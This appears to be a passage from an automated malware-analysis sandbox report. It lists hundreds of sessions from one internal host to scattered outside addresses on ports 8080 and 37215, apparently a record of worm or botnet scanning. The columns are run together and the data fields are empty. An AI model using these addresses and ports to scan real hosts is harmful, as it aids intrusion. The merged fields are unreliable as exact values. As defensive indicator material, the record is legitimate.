                                                        23707192.168.2.2350608222.27.67.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23708192.168.2.2341602185.235.225.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23709192.168.2.2347668160.146.206.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23710192.168.2.234005689.61.91.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23711192.168.2.2352198172.83.246.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23712192.168.2.235555444.52.23.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23713192.168.2.233790894.197.215.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23714192.168.2.23348104.35.155.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23715192.168.2.235503272.107.164.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23716192.168.2.2357358187.87.195.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23717192.168.2.235171836.244.58.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23718192.168.2.2360748142.160.221.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23719192.168.2.235186412.53.43.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23720192.168.2.2336364122.27.67.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23721192.168.2.235159225.150.78.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23722192.168.2.2345226192.9.45.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23723192.168.2.2339864160.142.155.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23724192.168.2.23453049.205.86.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23725192.168.2.2345068192.193.218.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23726192.168.2.2346988207.20.255.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23727192.168.2.233333650.170.86.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23728192.168.2.2356256189.175.41.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23729192.168.2.2333596129.139.65.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23730192.168.2.2336358154.70.32.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23731192.168.2.2350906211.110.66.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23732192.168.2.2333596150.163.198.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23733192.168.2.235798458.226.218.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23734192.168.2.2342732142.192.211.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23735192.168.2.234852099.152.50.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23736192.168.2.2357898211.163.171.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23737192.168.2.2349210116.244.28.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23738192.168.2.2353646124.162.201.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23739192.168.2.2334502134.104.165.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23740192.168.2.2348622199.232.198.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23741192.168.2.2333180113.104.165.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23742192.168.2.2349450209.3.172.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23743192.168.2.235206085.209.57.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23744192.168.2.234282468.142.29.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23745192.168.2.235109890.210.49.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23746192.168.2.2333884175.124.109.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23747192.168.2.2346908107.153.129.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23748192.168.2.235977666.153.63.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23749192.168.2.233534287.177.118.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23750192.168.2.234585689.245.92.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23751192.168.2.2351560119.39.224.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23752192.168.2.2343294136.244.90.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23753192.168.2.2335898105.77.94.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23754192.168.2.235676872.30.197.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23755192.168.2.2352308160.25.239.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23756192.168.2.2340202134.36.168.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23757192.168.2.233525041.114.5.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23758192.168.2.2359650180.119.188.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23759192.168.2.2338058166.150.67.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23760192.168.2.2346346113.215.212.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23761192.168.2.2360884192.27.32.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23762192.168.2.234315098.192.34.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23763192.168.2.2348704155.121.203.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23764192.168.2.2357776150.69.28.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23765192.168.2.2349780134.228.105.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23766192.168.2.2353838139.35.234.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23767192.168.2.234147427.115.51.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23768192.168.2.2347708203.202.192.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23769192.168.2.2333340124.198.29.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23770192.168.2.233405089.123.181.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23771192.168.2.2347702197.152.158.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23772192.168.2.2335934161.118.201.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23773192.168.2.2342226146.46.194.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23774192.168.2.2336748161.154.157.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23775192.168.2.2333860101.166.168.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23776192.168.2.235257832.113.163.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23777192.168.2.2342490154.153.69.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23778192.168.2.2336858193.99.180.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23779192.168.2.2341296197.44.240.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23780192.168.2.23396301.205.82.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23781192.168.2.2359762139.67.76.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23782192.168.2.2343962157.196.137.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23783192.168.2.235473046.142.177.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23784192.168.2.2354250197.238.252.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23785192.168.2.2334884101.3.50.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23786192.168.2.234732863.248.28.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23787192.168.2.2345742205.245.157.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23788192.168.2.2351444165.152.251.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23789192.168.2.234979031.99.28.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23790192.168.2.2353138164.164.226.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23791192.168.2.2344594190.47.168.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23792192.168.2.2358194138.131.215.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23793192.168.2.2342704141.227.9.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23794192.168.2.233756879.137.182.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23795192.168.2.2336520107.170.19.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23796192.168.2.2349188137.144.34.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23797192.168.2.2360310105.69.211.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23798192.168.2.2334276118.245.211.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23799192.168.2.234624657.68.190.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23800192.168.2.233436634.15.222.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23801192.168.2.2333080206.188.155.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23802192.168.2.235190243.135.67.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23803192.168.2.2344402170.146.166.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23804192.168.2.2335378152.105.44.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23805192.168.2.233774476.225.234.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23806192.168.2.2355600188.152.141.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23807192.168.2.2333182132.112.131.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23808192.168.2.2347372146.12.31.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23809192.168.2.23456525.168.226.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23810192.168.2.235351651.5.13.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23811192.168.2.2357210115.118.172.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23812192.168.2.235107443.236.112.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23813192.168.2.2344584222.153.205.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23814192.168.2.2340074182.154.124.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23815192.168.2.235829648.48.105.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23816192.168.2.235891476.183.39.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23817192.168.2.2338324129.161.19.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23818192.168.2.2333032106.213.186.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23819192.168.2.233711086.25.57.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23820192.168.2.2354584140.8.173.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23821192.168.2.2337094143.248.88.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23822192.168.2.2357396176.20.34.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23823192.168.2.2337960184.9.107.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23824192.168.2.2346076158.218.9.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23825192.168.2.23472042.181.47.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23826192.168.2.234811481.175.235.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23827192.168.2.2333696172.77.203.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23828192.168.2.2336994183.14.180.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23829192.168.2.2346664197.206.226.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23830192.168.2.2354122173.109.190.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23831192.168.2.2333840120.124.105.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23832192.168.2.235761431.212.1.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23833192.168.2.2360062102.197.1.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23834192.168.2.234451227.162.48.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23835192.168.2.2335146186.25.62.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23836192.168.2.2338034106.245.222.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23837192.168.2.2358052200.231.156.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23838192.168.2.233941472.62.119.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23839192.168.2.2351738196.234.9.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23840192.168.2.2344400157.84.241.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23841192.168.2.235080496.188.106.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23842192.168.2.2337390103.75.9.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23843192.168.2.2344008157.223.33.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23844192.168.2.2344856157.70.28.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23845192.168.2.2348604171.244.77.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23846192.168.2.2341062197.224.183.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23847192.168.2.2337946197.193.103.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23848192.168.2.234168641.250.22.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23849192.168.2.2344536197.161.149.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23850192.168.2.2347084210.132.250.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23851192.168.2.2339360157.13.16.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23852192.168.2.2350448157.16.185.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23853192.168.2.2359208157.124.96.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23854192.168.2.235603641.175.56.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23855192.168.2.236068041.49.34.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23856192.168.2.2334862157.154.69.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23857192.168.2.233758441.84.160.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23858192.168.2.2351466157.244.37.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23859192.168.2.2340524157.90.124.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23860192.168.2.2334748197.157.98.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23861192.168.2.2335726197.113.12.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23862192.168.2.233335241.206.35.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23863192.168.2.235976041.148.114.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23864192.168.2.2337144197.149.3.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23865192.168.2.234951841.219.115.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23866192.168.2.2352276157.202.88.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23867192.168.2.2340138157.205.128.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23868192.168.2.2334326197.205.27.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23869192.168.2.234714441.17.1.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23870192.168.2.2360590197.163.27.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23871192.168.2.2344536157.23.150.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23872192.168.2.2346574143.82.167.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23873192.168.2.235489041.228.235.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23874192.168.2.2350628197.59.143.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23875192.168.2.2346982197.83.158.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23876192.168.2.2333176157.25.61.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23877192.168.2.2340580197.191.63.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23878192.168.2.234371041.179.109.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23879192.168.2.235569041.197.103.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23880192.168.2.2360144149.197.128.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23881192.168.2.2339380181.216.252.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23882192.168.2.2341830197.49.192.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23883192.168.2.2345176197.28.220.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23884192.168.2.2343382157.74.198.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23885192.168.2.2336770139.235.94.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23886192.168.2.234436241.235.69.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23887192.168.2.233835236.154.243.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23888192.168.2.236027641.118.21.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23889192.168.2.234947041.168.119.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23890192.168.2.2353032157.49.98.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23891192.168.2.2337300157.156.97.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23892192.168.2.2345224157.15.25.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23893192.168.2.2346678157.68.40.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23894192.168.2.234454241.254.165.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23895192.168.2.2346520197.151.31.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23896192.168.2.2347456157.47.42.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23897192.168.2.2357896108.58.180.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23898192.168.2.2354362157.124.253.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23899192.168.2.2337714157.253.104.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23900192.168.2.2340118157.186.164.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23901192.168.2.234500841.74.17.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23902192.168.2.234470241.206.143.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23903192.168.2.2345372197.178.43.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23904192.168.2.2353192197.217.109.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23905192.168.2.2334544197.80.181.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23906192.168.2.233583841.180.178.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23907192.168.2.2342374197.1.159.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23908192.168.2.2348778157.129.158.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23909192.168.2.2334404197.237.128.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23910192.168.2.2339436156.225.209.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23911192.168.2.2337130197.248.183.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23912192.168.2.235624469.0.56.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23913192.168.2.2337132125.46.209.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23914192.168.2.2358446209.173.94.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23915192.168.2.233738889.161.17.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23916192.168.2.2342400157.32.254.1837215
                                                        TimestampBytes transferredDirectionData


